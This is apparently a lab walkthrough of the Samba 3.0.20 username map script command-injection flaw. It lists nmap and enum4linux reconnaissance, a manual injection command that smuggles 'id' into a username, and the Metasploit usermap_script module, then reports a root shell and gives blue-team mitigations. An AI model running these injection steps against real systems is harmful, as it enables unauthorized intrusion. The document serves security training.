01
Vulnerability Overview
Samba smbd 3.0.20 contains a vulnerability in its username map script feature that allows unauthenticated remote code execution. An attacker can craft a malicious username containing shell commands that get executed with root privileges.
This is a classic RCE vulnerability in Samba. The username map script processes user input unsafely, allowing command injection.
02
Service Detection
bash
nmap -sV -v -p 139,445 <target-ip>
03
SMB Enumeration
Use enum4linux to enumerate SMB shares and users:
bash
enum4linux -a <target-ip>
04
Exploitation
The vulnerability allows command execution via crafted username. Manual exploitation:
bash
smbclient -L //<target-ip> -U 'root;id'
05
Automated Exploitation — Metasploit
bash
msfconsole use exploit/multi/samba/usermap_script set RHOSTS <target-ip> run
06
Results & Impact
Outcome
- Successfully exploited username map script vulnerability
- Obtained root shell via command injection
- Full system access achieved
- Enumerated SMB shares and users
Detection & Mitigation (Blue Team)
- Update Samba to patched version
- Disable username map script feature
- Restrict SMB access to trusted networks
- Use firewall to block ports 139/445 externally
- Monitor SMB logs for suspicious activity